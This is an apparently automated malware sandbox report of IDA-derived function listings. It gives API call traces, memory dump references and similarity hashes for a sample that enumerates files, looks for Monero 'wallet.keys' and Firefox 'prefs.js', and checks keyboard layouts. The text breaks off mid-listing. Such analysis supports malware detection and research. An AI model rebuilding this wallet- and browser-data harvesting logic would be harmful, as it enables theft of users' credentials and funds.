                  Function 00FC4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                  • wsprintfA.USER32 ref: 00FC45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                  • StrCmpCA.SHLWAPI(?,00FD0FC4), ref: 00FC45EB
                  • StrCmpCA.SHLWAPI(?,00FD0FC8), ref: 00FC4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC468B
                  • FindClose.KERNEL32(000000FF), ref: 00FC46A0
                  • lstrcat.KERNEL32(?,00C8EA18), ref: 00FC46C5
                  • lstrcat.KERNEL32(?,00C8DBA0), ref: 00FC46D8
                  • lstrlen.KERNEL32(?), ref: 00FC46E5
                  • lstrlen.KERNEL32(?), ref: 00FC46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                  • Instruction ID: 4ec28969c1416ef91c83388230d4b44ef6f5b1d6dd14ae7b5fb5e35340e45804
                  • Opcode Fuzzy Hash: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                  • Instruction Fuzzy Hash: 675155719002189BC724EB70DD9AFE9737CAF58700F40459CB51E92144EB79AA859F91
                  Function 00FC3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00FC3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC3EDA
                  • StrCmpCA.SHLWAPI(?,00FD0FAC), ref: 00FC3F08
                  • StrCmpCA.SHLWAPI(?,00FD0FB0), ref: 00FC3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC406C
                  • FindClose.KERNEL32(000000FF), ref: 00FC4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                  • Instruction ID: e913659a028f83bc401e1e495bc58ed9fdb62bf2d618f445fbbb980fbc5c2686
                  • Opcode Fuzzy Hash: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                  • Instruction Fuzzy Hash: FB5165B2900219ABCB24EBB0DD46FEA737CBF48700F44459CB25D92044DB79AB859F61
                  Function 00FBED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00FBED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FBED55
                  • StrCmpCA.SHLWAPI(?,00FD1538), ref: 00FBEDAB
                  • StrCmpCA.SHLWAPI(?,00FD153C), ref: 00FBEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBF2AE
                  • FindClose.KERNEL32(000000FF), ref: 00FBF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                  • Instruction ID: cbf3a044b7df04cac8de88851e8214f8e582ec873fa55d7201688fc508f6f69c
                  • Opcode Fuzzy Hash: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                  • Instruction Fuzzy Hash: F5E1BD7191111D9AEB68EB60DD53FEE7338AF54304F4041ADB50A62092EE387F8AEF51
                  Function 00FBF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD15B8,00FD0D96), ref: 00FBF71E
                  • StrCmpCA.SHLWAPI(?,00FD15BC), ref: 00FBF76F
                  • StrCmpCA.SHLWAPI(?,00FD15C0), ref: 00FBF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBFAB1
                  • FindClose.KERNEL32(000000FF), ref: 00FBFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                  • Instruction ID: 3a9b12e7b7eb656574292ae50e9d79854e53069b81640732f7f908dac419dfb8
                  • Opcode Fuzzy Hash: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                  • Instruction Fuzzy Hash: 5DB143719001099BDB28EF60DD97FED7379AF54304F4085ADA40A97181EF38AB49EF92
                  Function 00FB16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD510C,?,?,?,00FD51B4,?,?,00000000,?,00000000), ref: 00FB1923
                  • StrCmpCA.SHLWAPI(?,00FD525C), ref: 00FB1973
                  • StrCmpCA.SHLWAPI(?,00FD5304), ref: 00FB1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00FB1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB1E20
                  • FindClose.KERNEL32(000000FF), ref: 00FB1E32
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                  • Instruction ID: 838dbe4bf447caf1fb40172993dc19fa380b1cc96e80c5b1ee7f78dc0b74034d
                  • Opcode Fuzzy Hash: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                  • Instruction Fuzzy Hash: E912C97191011D9BDB29EB60DD97FEE7378AF54304F4041ADA10A620D1EE387B89EF92
                  Function 00FBDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FD0C2E), ref: 00FBDE5E
                  • StrCmpCA.SHLWAPI(?,00FD14C8), ref: 00FBDEAE
                  • StrCmpCA.SHLWAPI(?,00FD14CC), ref: 00FBDEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBE3E0
                  • FindClose.KERNEL32(000000FF), ref: 00FBE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                  • Instruction ID: a6a1d176a5b40724f01dea5b268f4a55d41ebc5e449bc8af8a7cd7f5e90c22c9
                  • Opcode Fuzzy Hash: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                  • Instruction Fuzzy Hash: 47F17B7181411D9BDB29EB60DD96FEE7338AF14304F40419EA41A62091EE387F8ADE52
                  Function 00FBDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD14B0,00FD0C2A), ref: 00FBDAEB
                  • StrCmpCA.SHLWAPI(?,00FD14B4), ref: 00FBDB33
                  • StrCmpCA.SHLWAPI(?,00FD14B8), ref: 00FBDB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBDDCC
                  • FindClose.KERNEL32(000000FF), ref: 00FBDDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                  • Instruction ID: 781241dea92b82b6a6f0ef1d4f8178c7771ebbae33a5db5e012e729e6c950df2
                  • Opcode Fuzzy Hash: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                  • Instruction Fuzzy Hash: 6F9133729001099BCB14FB70ED57EED737DAF84304F40866CB81A96185FE38AB599F92
                  Function 00FC7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00FD05AF), ref: 00FC7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FC7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FC7C62
                  • LocalFree.KERNEL32(00000000), ref: 00FC7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                  • Instruction ID: 260bee2255410e70c51aa9a7413246aa9d396ff66130991b575cf0e990f59ab0
                  • Opcode Fuzzy Hash: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                  • Instruction Fuzzy Hash: 4741287194021DABCB24EB94DD9AFEEB374FF44704F204199E40A62280DB786E85DFA1
                  Function 0137999B Relevance: 10.3, Strings: 7, Instructions: 1563COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !5y$"JoR$&&7>$@Tm$fp?$w_~$|%/I
                  • API String ID: 0-4263199632
                  • Opcode ID: c34427f028f08696c64a6c8d0ae6391fb2a3d4cef0b2ab099168b0b7667a2888
                  • Instruction ID: 05cdf1741658230db11c268d4e323a446f86ba9024dedca74cf95d266f51c15c
                  • Opcode Fuzzy Hash: c34427f028f08696c64a6c8d0ae6391fb2a3d4cef0b2ab099168b0b7667a2888
                  • Instruction Fuzzy Hash: 85B203F360C204AFE3086E2DEC8567AFBE9EF94720F16492DE6C5C3744EA3558418B56
                  Function 00FBE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
